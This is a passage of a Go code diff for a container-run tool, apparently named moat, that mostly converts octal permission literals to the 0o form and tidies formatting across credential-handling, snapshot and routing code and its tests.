 	t.Setenv("HOME", tmpHome)
@@ -149,7 +149,7 @@ func TestProvider_ContainerInitFiles_StripsCredentials(t *testing.T) {
 
 	tmpHome := t.TempDir()
 	ghConfigDir := filepath.Join(tmpHome, ".config", "gh")
-	if err := os.MkdirAll(ghConfigDir, 0700); err != nil {
+	if err := os.MkdirAll(ghConfigDir, 0o700); err != nil {
 		t.Fatal(err)
 	}
 	// Config with embedded credentials (insecure-storage or older gh versions)
@@ -160,7 +160,7 @@ hosts:
     oauth_token: gho_SECRETTOKEN123
     user: testuser
 `
-	if err := os.WriteFile(filepath.Join(ghConfigDir, "config.yml"), []byte(configContent), 0600); err != nil {
+	if err := os.WriteFile(filepath.Join(ghConfigDir, "config.yml"), []byte(configContent), 0o600); err != nil {
 		t.Fatal(err)
 	}
 	t.Setenv("HOME", tmpHome)
@@ -198,12 +198,12 @@ func TestProvider_ContainerInitFiles_CredentialsOnly(t *testing.T) {
 
 	tmpHome := t.TempDir()
 	ghConfigDir := filepath.Join(tmpHome, ".config", "gh")
-	if err := os.MkdirAll(ghConfigDir, 0700); err != nil {
+	if err := os.MkdirAll(ghConfigDir, 0o700); err != nil {
 		t.Fatal(err)
 	}
 	// Config with only credential fields, no preferences
 	configContent := "hosts:\n  github.com:\n    oauth_token: gho_SECRET\n"
-	if err := os.WriteFile(filepath.Join(ghConfigDir, "config.yml"), []byte(configContent), 0600); err != nil {
+	if err := os.WriteFile(filepath.Join(ghConfigDir, "config.yml"), []byte(configContent), 0o600); err != nil {
 		t.Fatal(err)
 	}
 	t.Setenv("HOME", tmpHome)

--- a/internal/providers/npm/provider.go
+++ b/internal/providers/npm/provider.go
@@ -63,7 +63,7 @@ func (p *Provider) ContainerMounts(cred *provider.Credential, containerHome stri
 	if err != nil {
 		return nil, "", fmt.Errorf("creating npm config dir: %w", err)
 	}
-	if err := os.Chmod(tmpDir, 0700); err != nil {
+	if err := os.Chmod(tmpDir, 0o700); err != nil {
 		os.RemoveAll(tmpDir)
 		return nil, "", fmt.Errorf("setting permissions on npm config dir: %w", err)
 	}
@@ -78,7 +78,7 @@ func (p *Provider) ContainerMounts(cred *provider.Credential, containerHome stri
 	// Generate .npmrc with placeholder tokens
 	npmrcContent := GenerateNpmrc(entries, NpmTokenPlaceholder)
 	npmrcPath := filepath.Join(tmpDir, ".npmrc")
-	if err := os.WriteFile(npmrcPath, []byte(npmrcContent), 0600); err != nil {
+	if err := os.WriteFile(npmrcPath, []byte(npmrcContent), 0o600); err != nil {
 		return nil, "", fmt.Errorf("writing .npmrc: %w", err)
 	}
 

--- a/internal/providers/npm/provider_test.go
+++ b/internal/providers/npm/provider_test.go
@@ -262,7 +262,7 @@ func TestCleanup(t *testing.T) {
 		t.Fatalf("creating temp dir: %v", err)
 	}
 	// Create a file to verify cleanup
-	if writeErr := os.WriteFile(filepath.Join(tmpDir, "test"), []byte("data"), 0600); writeErr != nil {
+	if writeErr := os.WriteFile(filepath.Join(tmpDir, "test"), []byte("data"), 0o600); writeErr != nil {
 		t.Fatalf("creating test file: %v", writeErr)
 	}
 

--- a/internal/providers/oauth/config.go
+++ b/internal/providers/oauth/config.go
@@ -88,7 +88,7 @@ func LoadConfig(dir, name string) (*Config, error) {
 // SaveConfig writes an OAuth config to <dir>/<name>.yaml.
 // Creates the directory if it does not exist.
 func SaveConfig(dir, name string, cfg *Config) error {
-	if err := os.MkdirAll(dir, 0700); err != nil {
+	if err := os.MkdirAll(dir, 0o700); err != nil {
 		return fmt.Errorf("creating oauth config dir: %w", err)
 	}
 
@@ -98,7 +98,7 @@ func SaveConfig(dir, name string, cfg *Config) error {
 	}
 
 	path := filepath.Join(dir, name+".yaml")
-	if err := os.WriteFile(path, data, 0600); err != nil {
+	if err := os.WriteFile(path, data, 0o600); err != nil {
 		return fmt.Errorf("writing oauth config %s: %w", path, err)
 	}
 

--- a/internal/providers/oauth/config_test.go
+++ b/internal/providers/oauth/config_test.go
@@ -119,7 +119,7 @@ client_id: my-client-id
 client_secret: my-secret
 scopes: read write
 `
-		if err := os.WriteFile(filepath.Join(dir, "example.yaml"), []byte(content), 0600); err != nil {
+		if err := os.WriteFile(filepath.Join(dir, "example.yaml"), []byte(content), 0o600); err != nil {
 			t.Fatal(err)
 		}
 
@@ -154,7 +154,7 @@ scopes: read write
 
 	t.Run("invalid yaml", func(t *testing.T) {
 		dir := t.TempDir()
-		if err := os.WriteFile(filepath.Join(dir, "bad.yaml"), []byte(":::not yaml:::"), 0600); err != nil {
+		if err := os.WriteFile(filepath.Join(dir, "bad.yaml"), []byte(":::not yaml:::"), 0o600); err != nil {
 			t.Fatal(err)
 		}
 		_, err := LoadConfig(dir, "bad")
@@ -167,7 +167,7 @@ scopes: read write
 		dir := t.TempDir()
 		content := `client_id: my-client-id
 `
-		if err := os.WriteFile(filepath.Join(dir, "partial.yaml"), []byte(content), 0600); err != nil {
+		if err := os.WriteFile(filepath.Join(dir, "partial.yaml"), []byte(content), 0o600); err != nil {
 			t.Fatal(err)
 		}
 		_, err := LoadConfig(dir, "partial")

--- a/internal/quickstart/scan_test.go
+++ b/internal/quickstart/scan_test.go
@@ -24,8 +24,8 @@ func TestScanWorkspace_detectsFileTypes(t *testing.T) {
 	}
 	for name, content := range files {
 		path := filepath.Join(dir, name)
-		os.MkdirAll(filepath.Dir(path), 0755)
-		os.WriteFile(path, []byte(content), 0644)
+		os.MkdirAll(filepath.Dir(path), 0o755)
+		os.WriteFile(path, []byte(content), 0o644)
 	}
 
 	result := ScanWorkspace(dir)
@@ -49,7 +49,7 @@ func TestScanWorkspace_detectsManifests(t *testing.T) {
 
 	manifests := []string{"go.mod", "Makefile", "Dockerfile"}
 	for _, name := range manifests {
-		os.WriteFile(filepath.Join(dir, name), []byte("content"), 0644)
+		os.WriteFile(filepath.Join(dir, name), []byte("content"), 0o644)
 	}
 
 	result := ScanWorkspace(dir)
@@ -70,8 +70,8 @@ func TestScanWorkspace_detectsCIConfigs(t *testing.T) {
 	dir := t.TempDir()
 
 	ciDir := filepath.Join(dir, ".github", "workflows")
-	os.MkdirAll(ciDir, 0755)
-	os.WriteFile(filepath.Join(ciDir, "ci.yml"), []byte("name: CI"), 0644)
+	os.MkdirAll(ciDir, 0o755)
+	os.WriteFile(filepath.Join(ciDir, "ci.yml"), []byte("name: CI"), 0o644)
 
 	result := ScanWorkspace(dir)
 
@@ -85,12 +85,12 @@ func TestScanWorkspace_skipsNodeModules(t *testing.T) {
 
 	// Create a JS file in node_modules (should be skipped).
 	nmDir := filepath.Join(dir, "node_modules", "pkg")
-	os.MkdirAll(nmDir, 0755)
-	os.WriteFile(filepath.Join(nmDir, "index.js"), []byte("module.exports = {}"), 0644)
+	os.MkdirAll(nmDir, 0o755)
+	os.WriteFile(filepath.Join(nmDir, "index.js"), []byte("module.exports = {}"), 0o644)
 
 	// Create a JS file in src (should be counted).
-	os.MkdirAll(filepath.Join(dir, "src"), 0755)
-	os.WriteFile(filepath.Join(dir, "src", "app.js"), []byte("console.log()"), 0644)
+	os.MkdirAll(filepath.Join(dir, "src"), 0o755)
+	os.WriteFile(filepath.Join(dir, "src", "app.js"), []byte("console.log()"), 0o644)
 
 	result := ScanWorkspace(dir)
 

--- a/internal/routing/lock.go
+++ b/internal/routing/lock.go
@@ -47,7 +47,7 @@ func LoadProxyLock(dir string) (*ProxyLockInfo, error) {
 
 // SaveProxyLock writes the proxy lock file.
 func SaveProxyLock(dir string, info ProxyLockInfo) error {
-	if err := os.MkdirAll(dir, 0755); err != nil {
+	if err := os.MkdirAll(dir, 0o755); err != nil {
 		return err
 	}
 
@@ -61,7 +61,7 @@ func SaveProxyLock(dir string, info ProxyLockInfo) error {
 	}
 
 	path := filepath.Join(dir, "proxy.lock")
-	return os.WriteFile(path, data, 0644)
+	return os.WriteFile(path, data, 0o644)
 }
 
 // RemoveProxyLock removes the proxy lock file.

--- a/internal/routing/routes.go
+++ b/internal/routing/routes.go
@@ -23,7 +23,7 @@ type RouteTable struct {
 
 // NewRouteTable creates or loads a route table from the given directory.
 func NewRouteTable(dir string) (*RouteTable, error) {
-	if err := os.MkdirAll(dir, 0755); err != nil {
+	if err := os.MkdirAll(dir, 0o755); err != nil {
 		return nil, err
 	}
 
@@ -241,7 +241,7 @@ func (rt *RouteTable) save() error {
 		return err
 	}
 	// Match the previous routes.json mode (CreateTemp defaults to 0600).
-	if err := os.Chmod(tmpName, 0644); err != nil {
+	if err := os.Chmod(tmpName, 0o644); err != nil {
 		cleanup()
 		return err
 	}

--- a/internal/run/docker.go
+++ b/internal/run/docker.go
@@ -122,7 +122,7 @@ func GetDockerSocketGID() (uint32, error) {
 	// Check if socket is accessible by checking file permissions
 	// For Unix sockets, check read+write permission bits
 	mode := info.Mode()
-	if mode&0060 != 0060 { // Check group read+write
+	if mode&0o060 != 0o060 { // Check group read+write
 		log.Debug("docker socket has unexpected group permissions",
 			"mode", mode.String(),
 			"gid", gid)

--- a/internal/run/edge_cases_test.go
+++ b/internal/run/edge_cases_test.go
@@ -44,6 +44,7 @@ func (f *flexibleRuntime) Ping(context.Context) error { return nil }
 func (f *flexibleRuntime) CreateContainer(context.Context, container.Config) (string, error) {
 	return "ctr-test", nil
 }
+
 func (f *flexibleRuntime) StartContainer(ctx context.Context, id string) error {
 	if f.startFn != nil {
 		return f.startFn(ctx, id)
@@ -54,18 +55,22 @@ func (f *flexibleRuntime) VolumeCreate(context.Context, string) error { return n
 func (f *flexibleRuntime) VolumeRemove(context.Context, string, bool) error {
 	return nil
 }
+
 func (f *flexibleRuntime) VolumeList(context.Context, string) ([]string, error) {
 	return nil, nil
 }
+
 func (f *flexibleRuntime) VolumeExport(context.Context, string, string) error {
 	return nil
 }
+
 func (f *flexibleRuntime) StopContainer(ctx context.Context, id string) error {
 	if f.stopFn != nil {
 		return f.stopFn(ctx, id)
 	}
 	return nil
 }
+
 func (f *flexibleRuntime) WaitContainer(ctx context.Context, id string) (int64, error) {
 	if f.waitFn != nil {
 		return f.waitFn(ctx, id)
@@ -77,24 +82,28 @@ func (f *flexibleRuntime) WaitContainer(ctx context.Context, id string) (int64, 
 		return 0, ctx.Err()
 	}
 }
+
 func (f *flexibleRuntime) RemoveContainer(ctx context.Context, id string) error {
 	if f.removeFn != nil {
 		return f.removeFn(ctx, id)
 	}
 	return nil
 }
+
 func (f *flexibleRuntime) ContainerLogs(ctx context.Context, id string) (io.ReadCloser, error) {
 	if f.containerLogsFn != nil {
 		return f.containerLogsFn(ctx, id)
 	}
 	return io.NopCloser(strings.NewReader("")), nil
 }
+
 func (f *flexibleRuntime) ContainerLogsAll(ctx context.Context, id string) ([]byte, error) {
 	if f.containerLogsAllFn != nil {
 		return f.containerLogsAllFn(ctx, id)
 	}
 	return nil, nil
 }
+
 func (f *flexibleRuntime) ContainerState(_ context.Context, id string) (string, error) {
 	if f.states != nil {
 		state, ok := f.states[id]
@@ -105,6 +114,7 @@ func (f *flexibleRuntime) ContainerState(_ context.Context, id string) (string, 
 	}
 	return "running", nil
 }
+
 func (f *flexibleRuntime) GetPortBindings(context.Context, string) (map[int]int, error) {
 	return nil, nil
 }
@@ -121,9 +131,11 @@ func (f *flexibleRuntime) SetupFirewall(ctx context.Context, id, host string, po
 	}
 	return nil
 }
+
 func (f *flexibleRuntime) ListImages(context.Context) ([]container.ImageInfo, error) {
 	return nil, nil
 }
+
 func (f *flexibleRuntime) ListContainers(context.Context) ([]container.Info, error) {
 	return nil, nil
 }
@@ -131,6 +143,7 @@ func (f *flexibleRuntime) RemoveImage(context.Context, string) error { return ni
 func (f *flexibleRuntime) Attach(context.Context, string, container.AttachOptions) error {
 	return nil
 }
+
 func (f *flexibleRuntime) StartAttached(context.Context, string, container.AttachOptions) error {
 	return nil
 }
@@ -138,6 +151,7 @@ func (f *flexibleRuntime) ResizeTTY(context.Context, string, uint, uint) error {
 func (f *flexibleRuntime) Exec(context.Context, string, []string, []byte, io.Writer, io.Writer) error {
 	return nil
 }
+
 func (f *flexibleRuntime) ExecInteractive(context.Context, string, []string, container.ExecOptions) error {
 	return nil
 }

--- a/internal/run/manager.go
+++ b/internal/run/manager.go
@@ -1234,7 +1234,7 @@ func (m *Manager) Create(ctx context.Context, opts Options) (*Run, error) {
 			// Write the credential helper script
 			// Use 0700 permissions since the script contains the credential endpoint URL
 			helperPath := filepath.Join(awsDir, "credentials")
-			if err := os.WriteFile(helperPath, awsprov.GetCredentialHelper(), 0700); err != nil {
+			if err := os.WriteFile(helperPath, awsprov.GetCredentialHelper(), 0o700); err != nil {
 				cleanupDaemonRun()
 				return nil, fmt.Errorf("writing AWS credential helper: %w", err)
 			}
@@ -1245,7 +1245,7 @@ credential_process = /moat/aws/credentials
 region = %s
 `, r.AWSCredentialProvider.Region())
 			configPath := filepath.Join(awsDir, "config")
-			if err := os.WriteFile(configPath, []byte(awsConfig), 0644); err != nil {
+			if err := os.WriteFile(configPath, []byte(awsConfig), 0o644); err != nil {
 				cleanupDaemonRun()
 				return nil, fmt.Errorf("writing AWS config: %w", err)
 			}
@@ -1384,7 +1384,7 @@ region = %s
 		} else {
 			// Use Unix socket - can be mounted directly
 			sshSocketDir = filepath.Join(config.GlobalConfigDir(), "sockets", r.ID)
-			if err := os.MkdirAll(sshSocketDir, 0755); err != nil {
+			if err := os.MkdirAll(sshSocketDir, 0o755); err != nil {
 				upstreamAgent.Close()
 				cleanupDaemonRun()
 				return nil, fmt.Errorf("creating SSH socket directory: %w", err)
@@ -1936,7 +1936,7 @@ region = %s
 			// Ensure directory exists on host
 			if hostClaudeProjects == "" {
 				log.Warn("skipping Claude log sync mount: empty workspace path")
-			} else if err := os.MkdirAll(hostClaudeProjects, 0755); err != nil {
+			} else if err := os.MkdirAll(hostClaudeProjects, 0o755); err != nil {
 				ui.Warnf("Failed to create Claude logs directory: %v", err)
 			} else {
 				// Container writes to ~/.claude/projects/-workspace/
@@ -2141,7 +2141,7 @@ region = %s
 					// MarshalIndent cannot fail for Settings (no channels, funcs, or cycles);
 					// log.Warn for defense-in-depth only.
 					log.Warn("failed to marshal settings.json", "error", jsonErr)
-				} else if writeErr := os.WriteFile(settingsPath, settingsJSON, 0644); writeErr != nil {
+				} else if writeErr := os.WriteFile(settingsPath, settingsJSON, 0o644); writeErr != nil {
 					ui.Warnf("Failed to write Claude settings to container: %v", writeErr)
 				} else {
 					log.Debug("wrote settings.json to staging dir",
@@ -4331,7 +4331,7 @@ func ensureCACertOnlyDir(caDir, certOnlyDir string) error {
 	srcHash := sha256.Sum256(srcContent)
 
 	// Create directory if it doesn't exist
-	if err = os.MkdirAll(certOnlyDir, 0755); err != nil {
+	if err = os.MkdirAll(certOnlyDir, 0o755); err != nil {
 		return fmt.Errorf("creating directory: %w", err)
 	}
 
@@ -4358,7 +4358,7 @@ func ensureCACertOnlyDir(caDir, certOnlyDir string) error {
 		}
 	}
 
-	if err = os.WriteFile(certDst, srcContent, 0644); err != nil {
+	if err = os.WriteFile(certDst, srcContent, 0o644); err != nil {
 		return fmt.Errorf("writing CA certificate: %w", err)
 	}
 

--- a/internal/run/manager_test.go
+++ b/internal/run/manager_test.go
@@ -353,10 +353,10 @@ func TestEnsureCACertOnlyDir(t *testing.T) {
 	certContent := []byte("-----BEGIN CERTIFICATE-----\ntest cert\n-----END CERTIFICATE-----\n")
 	keyContent := []byte("-----BEGIN PRIVATE KEY-----\ntest key\n-----END PRIVATE KEY-----\n")
 
-	if err := os.WriteFile(filepath.Join(caDir, "ca.crt"), certContent, 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(caDir, "ca.crt"), certContent, 0o644); err != nil {
 		t.Fatal(err)
 	}
-	if err := os.WriteFile(filepath.Join(caDir, "ca.key"), keyContent, 0600); err != nil {
+	if err := os.WriteFile(filepath.Join(caDir, "ca.key"), keyContent, 0o600); err != nil {
 		t.Fatal(err)
 	}
 
@@ -401,7 +401,7 @@ func TestEnsureCACertOnlyDirCaching(t *testing.T) {
 	certContent := []byte("test certificate content")
 	certPath := filepath.Join(caDir, "ca.crt")
 
-	if err := os.WriteFile(certPath, certContent, 0644); err != nil {
+	if err := os.WriteFile(certPath, certContent, 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -428,7 +428,7 @@ func TestEnsureCACertOnlyDirCaching(t *testing.T) {
 
 	// Now change the source content - should trigger update
 	newContent := []byte("updated certificate content")
-	if err := os.WriteFile(certPath, newContent, 0644); err != nil {
+	if err := os.WriteFile(certPath, newContent, 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -452,16 +452,16 @@ func TestEnsureCACertOnlyDirRemovesStaleFiles(t *testing.T) {
 
 	// Create source certificate
 	certContent := []byte("-----BEGIN CERTIFICATE-----\ntest\n-----END CERTIFICATE-----")
-	if err := os.WriteFile(filepath.Join(caDir, "ca.crt"), certContent, 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(caDir, "ca.crt"), certContent, 0o644); err != nil {
 		t.Fatal(err)
 	}
 
 	// Create certOnlyDir with a stale file (simulating accidental private key copy)
-	if err := os.MkdirAll(certOnlyDir, 0755); err != nil {
+	if err := os.MkdirAll(certOnlyDir, 0o755); err != nil {
 		t.Fatal(err)
 	}
 	staleKeyPath := filepath.Join(certOnlyDir, "ca.key")
-	if err := os.WriteFile(staleKeyPath, []byte("PRIVATE KEY DATA"), 0600); err != nil {
+	if err := os.WriteFile(staleKeyPath, []byte("PRIVATE KEY DATA"), 0o600); err != nil {
 		t.Fatal(err)
 	}
 
@@ -852,9 +852,11 @@ func (s *stubRuntime) VolumeCreate(context.Context, string) error   { panic("not
 func (s *stubRuntime) VolumeRemove(context.Context, string, bool) error {
 	panic("not implemented")
 }
+
 func (s *stubRuntime) VolumeList(context.Context, string) ([]string, error) {
 	panic("not implemented")
 }
+
 func (s *stubRuntime) VolumeExport(context.Context, string, string) error {
 	panic("not implemented")
 }
@@ -872,9 +874,11 @@ func (s *stubRuntime) RemoveContainer(context.Context, string) error { return ni
 func (s *stubRuntime) ContainerLogs(context.Context, string) (io.ReadCloser, error) {
 	panic("not implemented")
 }
+
 func (s *stubRuntime) ContainerLogsAll(context.Context, string) ([]byte, error) {
 	return nil, nil // called by captureLogs after WaitContainer returns
 }
+
 func (s *stubRuntime) GetPortBindings(context.Context, string) (map[int]int, error) {
 	panic("not implemented")
 }
@@ -888,9 +892,11 @@ func (s *stubRuntime) Close() error                             { return nil }
 func (s *stubRuntime) SetupFirewall(context.Context, string, string, int) error {
 	panic("not implemented")
 }
+
 func (s *stubRuntime) ListImages(context.Context) ([]container.ImageInfo, error) {
 	panic("not implemented")
 }
+
 func (s *stubRuntime) ListContainers(context.Context) ([]container.Info, error) {
 	panic("not implemented")
 }
@@ -898,15 +904,19 @@ func (s *stubRuntime) RemoveImage(context.Context, string) error { panic("not im
 func (s *stubRuntime) Attach(context.Context, string, container.AttachOptions) error {
 	panic("not implemented")
 }
+
 func (s *stubRuntime) StartAttached(context.Context, string, container.AttachOptions) error {
 	panic("not implemented")
 }
+
 func (s *stubRuntime) ResizeTTY(context.Context, string, uint, uint) error {
 	panic("not implemented")
 }
+
 func (s *stubRuntime) Exec(context.Context, string, []string, []byte, io.Writer, io.Writer) error {
 	panic("not implemented")
 }
+
 func (s *stubRuntime) ExecInteractive(context.Context, string, []string, container.ExecOptions) error {
 	panic("not implemented")
 }

--- a/internal/run/run_test.go
+++ b/internal/run/run_test.go
@@ -221,7 +221,7 @@ func TestValidateGrants(t *testing.T) {
 	// Set up temporary credential store
 	tmpDir := t.TempDir()
 	credDir := filepath.Join(tmpDir, "credentials")
-	os.MkdirAll(credDir, 0700)
+	os.MkdirAll(credDir, 0o700)
 
 	key := make([]byte, 32)
 	rand.Read(key)
@@ -332,7 +332,7 @@ func TestValidateGrants(t *testing.T) {
 func TestValidateGrantsErrorFormat(t *testing.T) {
 	tmpDir := t.TempDir()
 	credDir := filepath.Join(tmpDir, "credentials")
-	os.MkdirAll(credDir, 0700)
+	os.MkdirAll(credDir, 0o700)
 
 	key := make([]byte, 32)
 	rand.Read(key)
@@ -357,7 +357,7 @@ func TestValidateGrantsErrorFormat(t *testing.T) {
 func TestValidateGrantsDecryptionFailure(t *testing.T) {
 	tmpDir := t.TempDir()
 	credDir := filepath.Join(tmpDir, "credentials")
-	os.MkdirAll(credDir, 0700)
+	os.MkdirAll(credDir, 0o700)
 
 	// Create store with one key and save a credential
 	key1 := make([]byte, 32)
@@ -393,7 +393,7 @@ func TestValidateMCPGrants(t *testing.T) {
 	// Set up temporary credential store
 	tmpDir := t.TempDir()
 	credDir := filepath.Join(tmpDir, "credentials")
-	os.MkdirAll(credDir, 0700)
+	os.MkdirAll(credDir, 0o700)
 
 	key := make([]byte, 32)
 	rand.Read(key)

--- a/internal/run/services.go
+++ b/internal/run/services.go
@@ -19,10 +19,12 @@ import (
 	"github.com/majorcontext/moat/internal/deps"
 )
 
-const passwordLength = 32
-const passwordChars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
-const readinessTimeout = 30 * time.Second
-const readinessInterval = 1 * time.Second
+const (
+	passwordLength    = 32
+	passwordChars     = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
+	readinessTimeout  = 30 * time.Second
+	readinessInterval = 1 * time.Second
+)
 
 // validProvisionItem matches safe provision item names (e.g., Ollama model names).
 // Allows alphanumerics, dots, dashes, underscores, colons, slashes, and @ signs.

--- a/internal/run/volume_test.go
+++ b/internal/run/volume_test.go
@@ -31,7 +31,7 @@ func TestVolumeWorkspaceMounts(t *testing.T) {
 
 func TestGuardVolumeWorkspaceRejectsWorktree(t *testing.T) {
 	dir := t.TempDir()
-	if err := os.WriteFile(filepath.Join(dir, ".git"), []byte("gitdir: /elsewhere/.git/worktrees/x"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(dir, ".git"), []byte("gitdir: /elsewhere/.git/worktrees/x"), 0o644); err != nil {
 		t.Fatal(err)
 	}
 	err := GuardVolumeWorkspace(dir, container.RuntimeDocker)
@@ -49,7 +49,7 @@ func TestGuardVolumeWorkspaceRejectsApple(t *testing.T) {
 
 func TestGuardVolumeWorkspaceAllowsNormalRepoOnDocker(t *testing.T) {
 	dir := t.TempDir()
-	if err := os.MkdirAll(filepath.Join(dir, ".git"), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Join(dir, ".git"), 0o755); err != nil {
 		t.Fatal(err)
 	}
 	if err := GuardVolumeWorkspace(dir, container.RuntimeDocker); err != nil {

--- a/internal/snapshot/apfs_darwin.go
+++ b/internal/snapshot/apfs_darwin.go
@@ -40,7 +40,7 @@ func (b *APFSBackend) Create(workspacePath, id string) (string, error) {
 	}
 
 	// Ensure snapshot directory exists
-	if err := os.MkdirAll(b.snapshotDir, 0755); err != nil {
+	if err := os.MkdirAll(b.snapshotDir, 0o755); err != nil {
 		return "", fmt.Errorf("create snapshot directory: %w", err)
 	}
 
@@ -164,7 +164,7 @@ func (b *APFSBackend) RestoreTo(nativeRef, destPath string) error {
 	}
 
 	// Ensure destination exists
-	if err := os.MkdirAll(destPath, 0755); err != nil {
+	if err := os.MkdirAll(destPath, 0o755); err != nil {
 		return fmt.Errorf("create destination directory: %w", err)
 	}
 

--- a/internal/snapshot/apfs_darwin_test.go
+++ b/internal/snapshot/apfs_darwin_test.go
@@ -31,13 +31,13 @@ func TestAPFSBackendCreateAndRestore(t *testing.T) {
 	snapshotDir := t.TempDir()
 
 	// Create test files
-	if err := os.WriteFile(filepath.Join(workspace, "file1.txt"), []byte("content1"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspace, "file1.txt"), []byte("content1"), 0o644); err != nil {
 		t.Fatal(err)
 	}
-	if err := os.MkdirAll(filepath.Join(workspace, "subdir"), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Join(workspace, "subdir"), 0o755); err != nil {
 		t.Fatal(err)
 	}
-	if err := os.WriteFile(filepath.Join(workspace, "subdir", "file2.txt"), []byte("content2"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspace, "subdir", "file2.txt"), []byte("content2"), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -72,7 +72,7 @@ func TestAPFSBackendCreateAndRestore(t *testing.T) {
 	}
 
 	// Modify the workspace
-	if err := os.WriteFile(filepath.Join(workspace, "file1.txt"), []byte("modified"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspace, "file1.txt"), []byte("modified"), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -111,10 +111,10 @@ func TestAPFSBackendRemovesGitDir(t *testing.T) {
 
 	// Create a .git directory
 	gitDir := filepath.Join(workspace, ".git")
-	if err := os.MkdirAll(gitDir, 0755); err != nil {
+	if err := os.MkdirAll(gitDir, 0o755); err != nil {
 		t.Fatal(err)
 	}
-	if err := os.WriteFile(filepath.Join(gitDir, "config"), []byte("git config"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(gitDir, "config"), []byte("git config"), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -176,7 +176,7 @@ func TestAPFSBackendRestoreTo(t *testing.T) {
 	destDir := t.TempDir()
 
 	// Create a test file
-	if err := os.WriteFile(filepath.Join(workspace, "test.txt"), []byte("test content"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspace, "test.txt"), []byte("test content"), 0o644); err != nil {
 		t.Fatal(err)
 	}
 

--- a/internal/snapshot/archive.go
+++ b/internal/snapshot/archive.go
@@ -48,7 +48,7 @@ func (b *ArchiveBackend) Name() string {
 // Create creates a tar.gz archive of the workspace.
 func (b *ArchiveBackend) Create(workspacePath, id string) (string, error) {
 	// Ensure snapshot directory exists
-	if err := os.MkdirAll(b.snapshotDir, 0755); err != nil {
+	if err := os.MkdirAll(b.snapshotDir, 0o755); err != nil {
 		return "", fmt.Errorf("create snapshot directory: %w", err)
 	}
 
@@ -56,7 +56,7 @@ func (b *ArchiveBackend) Create(workspacePath, id string) (string, error) {
 
 	// Create the archive file with restrictive permissions; archives may
 	// contain .git contents (remotes, credentials) in volume mode.
-	file, err := os.OpenFile(archivePath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0600)
+	file, err := os.OpenFile(archivePath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0o600)
 	if err != nil {
 		return "", fmt.Errorf("create archive file: %w", err)
 	}
@@ -150,7 +150,6 @@ func (b *ArchiveBackend) Create(workspacePath, id string) (string, error) {
 
 		return nil
 	})
-
 	if err != nil {
 		// Clean up on error
 		os.Remove(archivePath)
@@ -274,17 +273,17 @@ func (b *ArchiveBackend) RestoreTo(nativeRef, destPath string) error {
 		switch header.Typeflag {
 		case tar.TypeDir:
 			//nolint:gosec // G115: Mode is masked to permission bits which fit in uint32
-			if err := os.MkdirAll(targetPath, os.FileMode(header.Mode&0777)); err != nil {
+			if err := os.MkdirAll(targetPath, os.FileMode(header.Mode&0o777)); err != nil {
 				return fmt.Errorf("create directory %s: %w", header.Name, err)
 			}
 		case tar.TypeReg:
 			// Ensure parent directory exists
-			if err := os.MkdirAll(filepath.Dir(targetPath), 0755); err != nil {
+			if err := os.MkdirAll(filepath.Dir(targetPath), 0o755); err != nil {
 				return fmt.Errorf("create parent directory for %s: %w", header.Name, err)
 			}
 
 			//nolint:gosec // G115: Mode is masked to permission bits which fit in uint32
-			f, err := os.OpenFile(targetPath, os.O_CREATE|os.O_RDWR|os.O_TRUNC, os.FileMode(header.Mode&0777))
+			f, err := os.OpenFile(targetPath, os.O_CREATE|os.O_RDWR|os.O_TRUNC, os.FileMode(header.Mode&0o777))
 			if err != nil {
 				return fmt.Errorf("create file %s: %w", header.Name, err)
 			}
@@ -313,7 +312,7 @@ func (b *ArchiveBackend) RestoreTo(nativeRef, destPath string) error {
 			}
 		case tar.TypeSymlink:
 			// Ensure parent directory exists
-			if err := os.MkdirAll(filepath.Dir(targetPath), 0755); err != nil {
+			if err := os.MkdirAll(filepath.Dir(targetPath), 0o755); err != nil {
 				return fmt.Errorf("create parent directory for symlink %s: %w", header.Name, err)
 			}
 

--- a/internal/snapshot/archive_test.go
+++ b/internal/snapshot/archive_test.go
@@ -15,13 +15,13 @@ func TestArchiveBackend(t *testing.T) {
 	snapshotDir := t.TempDir()
 
 	// Create test files in workspace
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0o644); err != nil {
 		t.Fatalf("failed to create main.go: %v", err)
 	}
-	if err := os.MkdirAll(filepath.Join(workspaceDir, "pkg"), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Join(workspaceDir, "pkg"), 0o755); err != nil {
 		t.Fatalf("failed to create pkg dir: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "pkg/lib.go"), []byte("package pkg\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "pkg/lib.go"), []byte("package pkg\n"), 0o644); err != nil {
 		t.Fatalf("failed to create pkg/lib.go: %v", err)
 	}
 
@@ -46,10 +46,10 @@ func TestArchiveBackend(t *testing.T) {
 	}
 
 	// Modify workspace
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main // modified\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main // modified\n"), 0o644); err != nil {
 		t.Fatalf("failed to modify main.go: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "newfile.txt"), []byte("new content\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "newfile.txt"), []byte("new content\n"), 0o644); err != nil {
